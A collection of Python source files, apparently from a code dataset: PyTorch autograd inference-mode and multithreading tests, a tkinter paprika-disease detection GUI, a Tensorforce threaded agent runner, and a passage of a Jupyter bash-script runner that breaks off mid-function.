with torch.inference_mode():
a.add_(2)
self.assertFalse(torch.is_inference(a))
# tensors created outside of inference mode aren't
# inference tensors, so they will still have their
# version counters tracked
err_msg = ("one of the variables needed for gradient computation has been "
"modified by an inplace operation")
with self.assertRaisesRegex(RuntimeError, err_msg):
out.backward(torch.ones_like(out))
def test_inference_mode_inf_tensor_in_inf_mode_functional_op(self):
def functional_op(x):
return x * x
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# performing a non-view operation produces a inference tensor
# that does not require grad
func_out = functional_op(c)
self.assertTrue(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
def test_inference_mode_inf_tensor_in_inf_mode_inplace_op(self):
@torch.inference_mode()
def run_test(fn):
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# after performing inplace operation, tensor is still
# an inference tensor
fn(c)
self.assertTrue(torch.is_inference(c))
self.assertEqual(c.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_inf_mode_view_op(self):
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# perform view operation produces inference tensor
# that does not require grad
view_out = c.view(-1)
self.assertTrue(torch.is_inference(view_out))
self.assertFalse(view_out.requires_grad)
def test_inference_mode_inf_tensor_in_normal_mode_functional_op(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
func_out = functional_op(c)
self.assertFalse(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
self.assertTrue(func_out.is_leaf)
def test_inference_mode_inf_tensor_in_normal_mode_inplace_op(self):
def run_test(fn):
for requires_grad in (False, True):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
if requires_grad:
# leaf variable that requires grad is being used in an inplace
# operation when requires_grad=True
pass
else:
err_msg = "Inplace update to inference tensor outside InferenceMode"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(c)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_normal_mode_view_op(self):
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
out = c.view(-1)
self.assertTrue(torch.is_inference(out))
self.assertFalse(out.requires_grad)
self.assertFalse(out._is_view())
self.assertTrue(out.is_leaf)
def test_normal_tensor_inplace_output_in_inference_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_inplace_output_in_normal_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_view_output_in_inference_mode(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
# view -> view
tmp = out.view(-1)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
self.assertTrue(tmp._is_view())
self.assertTrue(tmp.is_leaf)
# view -> view -> inplace
self.assertTrue(torch.is_inference_mode_enabled())
tmp.add_(2)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
# Accessing is_leaf in python tries to update grad_fn and raises:
# A view was created in inference mode and its base or
# another view of its base has been modified inplace in normal mode
# tmp.is_leaf
self.assertEqual(a._version, tmp._version)
def test_normal_tensor_view_output_in_normal_mode(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
self.assertTrue(out.is_leaf)
tmp = functional_op(out)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
out.add_(2)
pass
else:
out.add_(2)
tmp = out.view(2, 3)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
def test_mix_inference_and_normal_tensor_functional_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# add is safe since it doesn't save any variable for backward
out = c.add(s)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
if requires_grad:
# leaf inference tensor with requires_grad=True can still have gradient
out.backward(torch.ones_like(out))
self.assertEqual(c.grad, torch.ones_like(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
c * s
# inference tensor in TensorList input
inputs = [s, c]
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.stack(inputs)
def test_mix_inference_and_normal_tensor_inplace_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
c = torch.ones(1, 2, 3)
self.assertTrue(torch.is_inference(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mul_(c)
# inference tensor in TensorList input
err_msg = ("out=... arguments don't support automatic differentiation, "
"but one of the arguments requires grad")
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
else:
a.mul_(c)
err_msg = "Inplace update to inference tensor outside InferenceMode is not allowed"
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
def test_mix_inference_and_normal_tensor_view_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3)
# view_as is a composite op which calls view with only one
# tensor argument. So there isn't a mixed inference and normal
# tensor inputs for view ops
tmp1 = c.view_as(s)
self.assertTrue(torch.is_inference(tmp1))
self.assertFalse(tmp1.requires_grad)
# this is fine since its equivalent as s.view(c.sizes()) which
# isn't a mixed input scenario
tmp2 = s.view_as(c)
self.assertFalse(torch.is_inference(tmp2))
self.assertEqual(tmp2.requires_grad, requires_grad)
def test_inference_mode_handle_direct_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view_as(a)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(view_out)
pass
else:
fn(view_out)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_handle_indirect_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view(-1)
fn(a)
if requires_grad:
err_msg = "A view was created in inference mode and its base or another view "
with self.assertRaisesRegex(RuntimeError, err_msg):
view_out.grad_fn
pass
else:
view_out.grad_fn
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
class TestMultithreadAutograd(TestCase):
def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None):
class PropagatingThread(threading.Thread):
'''Helper class to propagate exception from child
thread to main thread on join.
Reference: https://stackoverflow.com/a/31614591/5602957
'''
def run(self):
self.exception = None
try:
self.ret = super(PropagatingThread, self).run()
except Exception as e:
self.exception = e
def join(self, timeout=None):
super(PropagatingThread, self).join(timeout)
if self.exception:
raise self.exception from self.exception
return self.ret
threads = []
for _ in range(num_threads):
p = PropagatingThread(target=fn, args=args)
p.start()
threads.append(p)
for p in threads:
p.join()
def test_multithreaded_exception_propagation(self):
# Test whether exception in child thread
# are propagated to main thread.
def fn():
self.assertTrue(False)
with self.assertRaises(AssertionError):
self._run_py_multithread_fn(fn)
def test_simple_backward(self):
# simple multithreaded backward that create threads in the beginning of training
# and everything else is training separately, i.e. inputs, operations, etc.
def train_fn():
x = torch.ones(5, 5, requires_grad=True)
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
self.assertEqual(x.grad, x + 3.5)
self._run_py_multithread_fn(train_fn)
def test_simple_backward_same_input(self):
# simple multithreaded backward with only shared inputs (i.e. This is common
# for things like Hogwild multithreaded training with multiple CPU threads)
def train_fn_backward(x):
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
x = torch.ones(5, 5, requires_grad=True)
self._run_py_multithread_fn(train_fn_backward, (x,))
# Since we are calling backward from multiple threads
# and all threads share the same input, when we do backward
# concurrently, different backwards will all accumulate to
# the same .grad for each input, and the gradients should
# be equal to num_threads * gradient
self.assertEqual(x.grad, 10 * (x + 3.5))
def train_fn_grad(x):
y = (x + 3) * (x + 4) * 0.5
grads = torch.autograd.grad(y.sum(), x)
self.assertEqual(len(grads), 1)
self.assertEqual(grads[0], x + 3.5)
# since we use functional grad() api, gradients will not
# be accumulate to the same place and should be the same
self._run_py_multithread_fn(train_fn_grad, (x,))
def test_multithread_saved_tensors_hooks(self):
def pack(x):
warnings.warn("pack")
return x
def registers_hooks_for_each_thread():
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
x = torch.ones(5, 5, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
y = x * x
# should raise two warnings from x being saved twice
self.assertEqual(len(w), 2)
y.sum().backward()
def test_dataparallel_saved_tensors_hooks(self):
def pack(x):
warnings.warn("pack")
return x
_self = self
class Model(torch.nn.Module):
def forward(self, x):
with warnings.catch_warnings(record=True) as w:
y = x * x
if torch.cuda.device_count() >= 2:
# DataParallel is calling the forward in different threads
# without progating TLS, so hooks should not be called here
_self.assertEqual(len(w), 0)
else:
# DataParallel only uses one thread
# so hooks should be called here
_self.assertGreater(len(w), 0)
x = torch.ones(5, 5, requires_grad=True)
model = torch.nn.DataParallel(Model())
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
model(x)
with warnings.catch_warnings(record=True) as w:
y = x * x
# hooks should be called here
_self.assertGreater(len(w), 0)
def test_python_thread_in_middle(self):
# User might write a network that starts on one CPU thread, then runs its second half
# concurrently with other threads (either via python threading or fork/join calls),
# then calls backward()/grad() on BOTH threads, like a Y pattern from input at the
# bottom to output at the top. This way part of the GraphTask is being shared across
# different threads and we need to ensure user specify retain_graph=True, otherwise
# error out with the correct error message
# Case 1: multiple backward with python threads, retain_graph=False
# should throw error in some threads with no retain_graph.
success_vs_raises = [0, 0]
def train_fn_no_retain_graph(x):
y = x + x ** 2
try:
y.sum().backward()
success_vs_raises[0] += 1
except RuntimeError as error:
success_vs_raises[1] += 1
self.assertRegex(str(error), "Specify retain_graph=True")
x_no_retain = torch.ones(5, 5, requires_grad=True)
y_no_retain = x_no_retain + x_no_retain ** 2
self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5)
# at least one thread will be success in this case, all other threads should raise
# with the error that throw to user to recommend them specify retain_graph=True
self.assertTrue(success_vs_raises[0] >= 1)
# multiple backward with python threads, no error with retain_graph=True
def train_fn_retain_graph(x):
y = x + x ** 2
y.sum().backward(retain_graph=True)
x_retain = torch.ones(5, 5, requires_grad=True)
y_retain = x_retain + x_retain ** 2
self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5)
# result should equal to num_thread * gradients
self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1))
def test_fork_join_in_middle(self):
# multiple backward with jit threads (fork/join primitive)
# similar to test_python_thread_in_middle, we test with retain_graph=False/True
# Case 1: multiple grad() calls with jit threads, retain_graph=False
# should throw error in some threads with no retain_graph.
@torch.jit.script
def train_fn_jit_no_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x])
@torch.jit.script
def train_fn_fork_join_calls_no_retain(x):
y_no_retain = (x + 3) * (x + 4) * 0.5
fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x)
grad_hat = train_fn_jit_no_retain(y_no_retain, x)
grad = torch.jit._wait(fut)
return grad, grad_hat
try:
train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True))
except RuntimeError as error:
self.assertRegex(str(error), "Specify retain_graph=True")
# Case 2: no error with retain_graph=True
@torch.jit.script
def train_fn_jit_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True)
@torch.jit.script
def train_fn_fork_join_calls_retain(x):
y_retain = (x + 3) * (x + 4) * 0.5
fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
grad = train_fn_jit_retain(y_retain, x)
grad1 = torch.jit._wait(fut1)
grad2 = torch.jit._wait(fut2)
return grad, grad1, grad2
grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True))
self.assertEqual(grad, grad1)
self.assertEqual(grad, grad2)
def test_preserve_backtrace(self):
class Foo(torch.autograd.Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, *grad):
raise ValueError("something")
t = torch.rand(10, requires_grad=True)
try:
Foo.apply(t).sum().backward()
except Exception:
import traceback
tb = sys.exc_info()[2]
tb_str = "\n".join(traceback.format_tb(tb))
self.assertTrue('raise ValueError("something")' in tb_str)
# TODO(@anjali411): add an OpInfo based test for torch.cat
# Issue: https://github.com/pytorch/pytorch/issues/51627
def test_cat_r_to_c(self):
inp_c = torch.rand(3, 2, dtype=torch.cdouble, requires_grad=True)
inp_r = torch.randn(3, 2, dtype=torch.double, requires_grad=True)
def fn(x1, x2):
return torch.cat((x1, x2), dim=-1)
torch.autograd.gradcheck(fn, [inp_r, inp_c], check_forward_ad=True)
torch.autograd.gradcheck(fn, [inp_c, inp_r], check_forward_ad=True)
# Import test cases from below autograd/ here. These are found
# implicitly by the loader, so Flake8 thinks they are unused, hence
# the suppressions.
from autograd.test_complex import TestAutogradComplex # noqa: F401
# e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA
instantiate_device_type_tests(
TestAutogradDeviceType,
globals(),
except_for=None
)
instantiate_parametrized_tests(TestAutograd)
if __name__ == '__main__':
run_tests()
|
gui.py
|
from tkinter import *
from tkinter.ttk import Progressbar
import tkinter.messagebox
from tkinter.ttk import Progressbar, Style, Button
import cv2, os
from tkinter import filedialog
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
from PIL import ImageTk, Image
from inference import SurvedModel
mpl.rcParams['figure.dpi'] = 300
import time
from threading import Thread
##################################################
# Decair variables and create class instances
##################################################
model = SurvedModel()
# For details regarding paprika in drop down menu
details = 'Paprika Plant commonly known as Bell Pepper is suseptble to many diseases, this program implements the Machine \
Learning algorithm to detect a few of those diseases. A few of them are:\
\n1. Blossom_end_rot\
\n2. Powdery Mildew \
\n3. Cercospora \
\n4. Graymold \
\n5. Spider Mite'
help_msg = 'A Machine Learning algorithm for detecting plant disease by RV Lab.\nHomepage: https://home.jbnu.ac.kr/robotv/index.htm'
##################################################
# Decair functions you will use in your GUI
##################################################
def model_loader():
'''For loading the model on GPU by givin dummy input'''
_ = model.predict(np.ones((600,600,3)).astype(np.uint8))
def paprika():
'''For Details regarding program in drop down menue'''
tkinter.messagebox.showinfo(title='Paprika Plant', message=details)
def fct():
'''Model loading progress bar'''
for i in range(1, 101):
# because it takes about ~30 seconds for the model to be uploaded on GPU => 0.3*100
time.sleep(0.3)
progress.step()
if i != 100:
s.configure("LabeledProgressbar", text="Loading Model on GPU please wait: {0} % ".format(i))
elif i == 100:
s.configure("LabeledProgressbar", text="Done Loading Model")
root.update()
def bar():
'''For makin undeterminstic progress bar (not used in this script)'''
steps = [0, 20, 40, 50, 60, 80, 100, 80, 60, 50, 40, 20]
for i in steps:
progress_det['value'] = i
root.update_idletasks()
time.sleep(0.00009)
progress_det['value'] = 0
def increment():
'''The detection progress bar'''
for i in range(100):
progress_det["value"] = i+1
root.update()
time.sleep(0.00009)
def about_us():
'''About us message in drop down menue'''
tkinter.messagebox.showinfo(title='Robot Vision Lab', message = help_msg)
def browse_file():
'''For loadinf file in model via drop down menue'''
# to clear frame
for widget in resultframe.winfo_children():
widget.destroy()
global img_path, img, name
img_path = filedialog.askopenfilename()
img = cv2.imread(img_path)
img2 = cv2.resize(img, (640,640))# just so it can fit inside root window
img2 = cv2.cvtColor(img2, cv2.COLOR_BGR2RGB)
name = os.path.basename(img_path)
photo2 = ImageTk.PhotoImage(Image.fromarray(img2))
# label widget also acts as a conteiner so we can use it to embed image
labelphoto2 = Label(resultframe, image = photo2)
labelphoto2.img2 = photo2
labelphoto2.pack(side=LEFT, padx=5)
statusbar['bg'] = 'white'
statusbar['text'] = 'Loaded Image: {}'.format(name)
def play_btn():
'''Command function for when you click "Detect" button '''
try:
print('Running')
op = model.predict(img)
print('Done')
increment()
op = cv2.resize(op, (640,640))
photo3 = ImageTk.PhotoImage(Image.fromarray(op))
labelphoto3 = Label(resultframe, image = photo3)
labelphoto3.img = photo3
labelphoto3.pack(side=RIGHT, padx=5)
statusbar['bg'] = 'green'
statusbar['text'] = 'Done'
except NameError:
tkinter.messagebox.showerror(title='File not found', message='Load an image before running the detection model')
##################################################
# Now start creating window GUI
##################################################
# creat a window and store in inside root variable it'll be created for
# milisecondes
root = Tk()
# frame 1 for title
titleframe = Frame(root)
titleframe.pack(padx=10, pady=10)
# isolation frame 1 for ip/op images
resultframe = Frame(root, relief=RAISED, borderwidth=1)# , relief=RAISED, borderwidth=1
resultframe.pack(padx=10, pady=10)
# command frame for detect button and progress bars
commandframe = Frame(root)
commandframe.pack(padx=10, pady=10)
# add title of main root window
root.title('Disease Detector')
# add icon of main root window
root.iconbitmap(r'C:/Users/Talha/Desktop/chkpt/paprika_model/icon.ico')
# increase the size of window so that when script is run it opens a 1500x1500px window
root.geometry('1500x1500')
#*****************************
# creat a menubar
menubar = Menu(root)
root.config(menu = menubar)
# creat submenu
submenu = Menu(menubar, tearoff = 0)
menubar.add_cascade(labe='File', menu=submenu)
submenu.add_command(label='Load Image', command= browse_file)
submenu.add_command(label='About Paprika', command=paprika)
# creat submenu 2
submenu2 = Menu(menubar, tearoff = 0)
menubar.add_cascade(labe='Help', menu=submenu2)
submenu2.add_command(label='About Us', command = about_us)
submenu2.add_command(label='Exit', command=root.destroy)
#*******************************
# Header Line of the GUI
# add photo
photo = PhotoImage(file='C:/Users/Talha/Desktop/chkpt/paprika_model/rv.png')
# label widget also acts as a conteiner so we can use it to embed image
labelphoto = Label(titleframe, image = photo)
labelphoto.pack(side=LEFT)
# Label widget
text = Label(titleframe, text='Load Paprika Image for Disease Detection.', fg = "black",bg = "white",font = "Helvetica 16 bold italic")
# now you'll have to pack it inside tkinter window
text.pack(side=LEFT)
#*************************************************************************************************************************
# Initilizing progress bars
# progressbar with text inside it
s = Style(root)
# add the label to the progressbar style
s.layout("LabeledProgressbar",
[('LabeledProgressbar.trough',
{'children': [('LabeledProgressbar.pbar',
{'side': 'left', 'sticky': 'ns'}),
("LabeledProgressbar.label", # label inside the bar
{"sticky": ""})],
'sticky': 'nswe'})])
progress = Progressbar(commandframe, orient="horizontal", length=300, style="LabeledProgressbar")
progress.pack(side=TOP, padx=10, pady=10)
# change the text of the progressbar,
# the trailing spaces are here to properly center the text
s.configure("LabeledProgressbar", text="Loading Model on GPU please wait:0 % ")
# uncomment this if you want to make an image button instead of 'Detect' text button
#btnphoto = ImageTk.PhotoImage(Image.open('C:/Users/Talha/Desktop/chkpt/paprika_model/run.png'))
# make detect button
btn = Button(commandframe, text='Detect', command =play_btn)#image = btnphoto,
btn.pack(side=LEFT, padx=10, pady=10)
# 2nd progress bar with detect button
progress_det = Progressbar(commandframe, length=200, cursor='watch',mode="determinate", orient=HORIZONTAL)
#progress_det = Progressbar(commandframe, orient = HORIZONTAL, length = 100, mode = 'indeterminate') # for shuttling block progress bar
progress_det.pack(side=LEFT, padx=10, pady=10)
##################################################
# Start threadin b/c loading model on GPU will take time
# threading will run processes in parallel so that our GUI don't stop responding
##################################################
# Start loading model bar
thread1 = Thread(target=fct, daemon=True)
thread1.start()
print('thread 1 start')
# Now start loading mdoel on GPU in parallel
thread2 = Thread(target=model_loader, daemon=True)
thread2.start()
# make a Bottom statusbar for knowing the status of program
statusbar = Label(root, text = 'Welcome to Paprika Disease Detector', relief = SUNKEN, anchor=W)
statusbar.pack(side=BOTTOM, fill=X)
# it'll run the loop in an infinite loop (if you comment it it'll might give some error)
root.mainloop()
|
threaded_runner.py
|
# Copyright 2017 reinforce.io. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Runner for non-realtime threaded execution of multiple agents.
"""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import time
import threading
from six.moves import xrange
from tensorforce.agents.agent import Agent
from tensorforce import TensorForceError
class ThreadedRunner(object):
def __init__(self, agents, environments, repeat_actions=1, save_path=None, save_episodes=None):
"""
Initialize a Runner object.
Args:
agent: `Agent` object containing the reinforcement learning agent
environment: `../../environments/Environment` object containing
repeat_actions:
save_path:
save_episodes:
"""
if len(agents) != len(environments):
raise TensorForceError("Each agent must have its own environment. Got {a} agents and {e} environments.".
format(a=len(agents), e=len(environments)))
self.agents = agents
self.environments = environments
self.repeat_actions = repeat_actions
self.save_path = save_path
self.save_episodes = save_episodes
def _run_single(self, thread_id, agent, environment, repeat_actions=1, max_timesteps=-1, episode_finished=None):
"""
The target function for a thread, runs an agent and environment until signaled to stop.
Adds rewards to shared episode rewards list.
Args:
max_timesteps: Max timesteps in a given episode
episode_finished: Optional termination condition, e.g. a particular mean reward threshold
Returns:
"""
episode = 1
while not self.global_should_stop:
state = environment.reset()
agent.reset()
episode_reward = 0
timestep = 0
while True:
action = agent.act(states=state)
if repeat_actions > 1:
reward = 0
for repeat in xrange(repeat_actions):
state, terminal, step_reward = environment.execute(actions=action)
reward += step_reward
if terminal:
break
else:
state, terminal, reward = environment.execute(actions=action)
agent.observe(reward=reward, terminal=terminal)
timestep += 1
self.global_step += 1
episode_reward += reward
if terminal or timestep == max_timesteps:
break
if self.global_should_stop:
return
#agent.observe_episode_reward(episode_reward)
self.episode_rewards.append(episode_reward)
self.episode_lengths.append(timestep)
summary_data = {
"thread_id": thread_id,
"episode": episode,
"timestep": timestep,
"episode_reward": episode_reward
}
if episode_finished and not episode_finished(summary_data):
return
episode += 1
self.global_episode += 1
def run(self, episodes=-1, max_timesteps=-1, episode_finished=None, summary_report=None, summary_interval=0):
# Save episode reward and length for statistics.
self.episode_rewards = []
self.episode_lengths = []
self.global_step = 0
self.global_episode = 1
self.global_should_stop = False
# Create threads
threads = [threading.Thread(target=self._run_single, args=(t, self.agents[t], self.environments[t],),
kwargs={"repeat_actions": self.repeat_actions,
"max_timesteps": max_timesteps,
"episode_finished": episode_finished})
for t in range(len(self.agents))]
# Start threads
self.start_time = time.time()
[t.start() for t in threads]
try:
next_summary = 0
next_save = 0
while self.global_episode < episodes or episodes == -1:
if self.global_episode > next_summary:
summary_report(self)
next_summary += summary_interval
if self.save_path and self.save_episodes is not None and self.global_episode > next_save:
print("Saving agent after episode {}".format(self.global_episode))
self.agents[0].save_model(self.save_path)
next_save += self.save_episodes
time.sleep(1)
except KeyboardInterrupt:
print('Keyboard interrupt, sending stop command to threads')
self.global_should_stop = True
# Join threads
[t.join() for t in threads]
print('All threads stopped')
def WorkerAgentGenerator(agent_class):
"""
Worker Agent generator, recieves an Agent class and creates a Worker Agent class that inherits from that Agent.
"""
class WorkerAgent(agent_class):
"""
Worker agent receiving a shared model to avoid creating multiple models.
"""
def __init__(self, states_spec, actions_spec, network_spec, model=None, **kwargs):
self.network_spec = network_spec
self.model = model
super(WorkerAgent, self).__init__(
states_spec,
actions_spec,
network_spec,
**kwargs
)
def initialize_model(self, states_spec, actions_spec):
return self.model
return WorkerAgent
|
runner.py
|
from IPython.display import display
import ipywidgets as widgets
import subprocess
import argparse
import sys
import time
import threading
from .logview import LogView
from .logfile import LogFile
def run_script(script):
"""
Run script via Python API.
It is an internal testing API.
"""
runner = Runner("")
runner.run(script)
class RunScriptProxy:
def __init__(self):
self.mutex = threading.Lock()
self.is_finished = False
self.error = None
self.messages = []
def acquire(self):
self.mutex.acquire()
def release(self):
self.mutex.release()
def execute_script_in_thread(script):
def worker(proxy, script):
try:
process = subprocess.Popen(script,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True,
universal_newlines=True,
executable='/bin/bash')
for line in process.stdout:
proxy.acquire()
proxy.messages.append(line)
proxy.release()
except Exception as e:
proxy.acquire()
proxy.error = e
proxy.release()
proxy.acquire()
if process.wait() != 0:
proxy.error = Exception("Failed!")
proxy.is_finished = True
proxy.release()
proxy = RunScriptProxy()
thread = threading.Thread(target=worker, args=(proxy, script))
thread.start()
return proxy
def run_chain(funcs):
if len(funcs) == 0:
return
remaining = funcs[1:]
func = funcs[0]
def next():
run_chain(remaining)
func(next)
class Runner:
def __init__(self, args):
parser = argparse.ArgumentParser(prog="livebash", add_help=False)
parser.add_argument('-h', '--help',
action='store_true', dest='print_help')
parser.add_argument('--save',
dest='output_file', type=str, help="Save output to a file")
parser.add_argument('--save-timestamp',
action='store_true', dest='use_timestamp',
help="Add timestamp to the output file name")
parser.add_argument('--line-limit',
dest='line_limit', default=0, type=int,
help="Restrict the no. of lines to be shown")
parser.add_argument('--height',
dest='height', default=0, type=int,
help="Set the height of the output cell (no. of line)")
parser.add_argument('--ask-confirm',
action='store_true', dest='ask_confirm',
help="Ask for confirmation before execution")
parser.add_argument('--notify',
action='store_true', dest='send_notification',
help="Send a notification when the script finished")
parser.add_argument('--keep-cell-output',
action='store_true', dest='keep_cell_output',
help="Keep the cell output")
self.args = parser.parse_args(args)
self.parser = parser
self.log_view = LogView()
self.line_printed = 0
self.is_executed = False
if self.args.output_file is not None:
self.log_file = LogFile(
pattern=self.args.output_file,
use_timestamp=self.args.use_timestamp
)
self.log_view.height = self.args.height
self.container = widgets.VBox(
[self.log_view]
)
self.grid_box = widgets.GridBox(
children=[self.container],
layout=widgets.Layout(
width="100%",
grid_template_rows='auto',
grid_template_columns='100%'
)
)
def run(self, script):
display(self.grid_box)
funcs = [
lambda next: self.execute_confirmation(next),
lambda next: self.execute_notification(next),
lambda next: self.execute_logger(next),
lambda next: self.execute_script(script, next)
]
run_chain(funcs)
def execute_confirmation(self, next):
if self.args.ask_confirm is not True:
next()
return
confirm_button = widgets.Button(description="Confirm")
cancel_button = widgets.Button(description="Cancel")
output = widgets.Output()
hbox = widgets.HBox([confirm_button, cancel_button])
def confirm(_):
hbox.layout.display = 'none'
output.layout.display = 'none'
next()
def cancel(_):
hbox.layout.display = 'none'
with output:
print("")
print("Canceled")
confirm_button.on_click(confirm)
cancel_button.on_click(cancel)
self.container.children = [output, hbox] + \
list(self.container.children)
with output:
print("Are you sure you want to run this script?")
def flush(self):
self.log_view.flush()
if self.args.output_file is not None:
self.log_file.flush()
def write_message(self, line):
self.line_printed = self.line_printed + 1
if self.args.output_file is not None:
self.log_file.write_message(line)
if self.args.keep_cell_output is True:
sys.stdout.write(line)
return
if (self.line_printed >= self.args.line_limit and
self.args.line_limit > 0):
if self.log_view.status_header == "":
self.log_view.status_header = "=== Output exceed the line limitation. Only the latest output will be shown ===" # noqa
self.log_view.write_status(line)
else:
self.log_view.write_message(line)
def execute_script(self, script, next):
if self.is_executed:
return
self.is_executed = True
self.log_view.running = True
try:
proxy = execute_script_in_thread(script)
while True:
time.sleep(0.1)
proxy.acquire()
messages = proxy.messages
is_finished = proxy.is_finished
error = proxy.error
proxy.messages = []
proxy.release()
if len(messages) > 0:
for message in messages:
self.write_message(message)
self.flush()
if is_finished or error is not None:
break
except Exception as e:
error = e
self.log_view.flush()
self.log_view.running = False
if error is not None:
raise error
next()
def execute_notification(self, next):
if self.args.send_notification is False:
next()
return
def callback(permission):
if permission != "granted":
self.log_view.write_message(
f"Request notification permission failed: {permission}")
return
next()
